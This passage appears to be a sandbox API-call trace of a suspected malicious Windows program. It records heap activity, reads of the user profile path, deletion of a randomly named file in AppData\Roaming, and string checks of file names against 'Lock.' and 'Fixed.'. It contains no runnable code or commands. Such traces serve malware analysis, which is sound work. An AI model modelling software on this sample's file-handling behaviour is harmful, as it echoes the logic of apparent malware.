[0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.941] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0206.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0206.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0206.942] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0206.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0206.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.942] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0206.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0206.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0206.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/uKUOp3ady.png", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKUOp3ady.png", lpFilePart=0x8bedfc*="uKUOp3ady.png") returned 0x3b [0206.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0206.944] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKUOp3ady.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ukuop3ady.png")) returned 0x2020 [0206.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKUOp3ady.png", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb5d5ab0, ftCreationTime.dwHighDateTime=0x1d4d0e8, ftLastAccessTime.dwLowDateTime=0x6e122060, ftLastAccessTime.dwHighDateTime=0x1d4d080, ftLastWriteTime.dwLowDateTime=0x6e122060, ftLastWriteTime.dwHighDateTime=0x1d4d080, nFileSizeHigh=0x0, nFileSizeLow=0x17d25, dwReserved0=0xe64, dwReserved1=0x4, cFileName="uKUOp3ady.png", cAlternateFileName="UKUOP3~1.PNG")) returned 0xaa5860 [0206.944] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKUOp3ady.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ukuop3ady.png")) returned 1 [0206.946] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb5d5ab0, ftCreationTime.dwHighDateTime=0x1d4d0e8, ftLastAccessTime.dwLowDateTime=0x6e122060, ftLastAccessTime.dwHighDateTime=0x1d4d080, ftLastWriteTime.dwLowDateTime=0x6e122060, ftLastWriteTime.dwHighDateTime=0x1d4d080, nFileSizeHigh=0x0, nFileSizeLow=0x17d25, dwReserved0=0xe64, dwReserved1=0x4, cFileName="uKUOp3ady.png", cAlternateFileName="UKUOP3~1.PNG")) returned 0 [0206.946] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0206.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.946] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0206.947] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0206.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0206.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0206.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.948] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0206.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0206.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0206.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0206.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0206.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0206.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0206.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0206.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0206.950] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/uKUOp3ady.png", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKUOp3ady.png", lpFilePart=0x8bf658*="uKUOp3ady.png") returned 0x3b [0206.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0206.950] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKUOp3ady.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ukuop3ady.png")) returned 0xffffffff [0206.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.950] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0206.950] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.950] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0206.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0206.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0206.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0206.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="USOrj0U79kg56B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SOrj0U79kg56B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Orj0U79kg56B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rj0U79kg56B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j0U79kg56B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0U79kg56B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U79kg56B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="79kg56B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9kg56B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kg56B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g56B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="56B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZLC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LC3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.952] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="USOrj0U79kg56B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SOrj0U79kg56B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Orj0U79kg56B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rj0U79kg56B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j0U79kg56B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0U79kg56B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U79kg56B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="79kg56B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9kg56B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kg56B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g56B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="56B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZLC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LC3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C3.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.954] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0206.954] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0206.954] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, 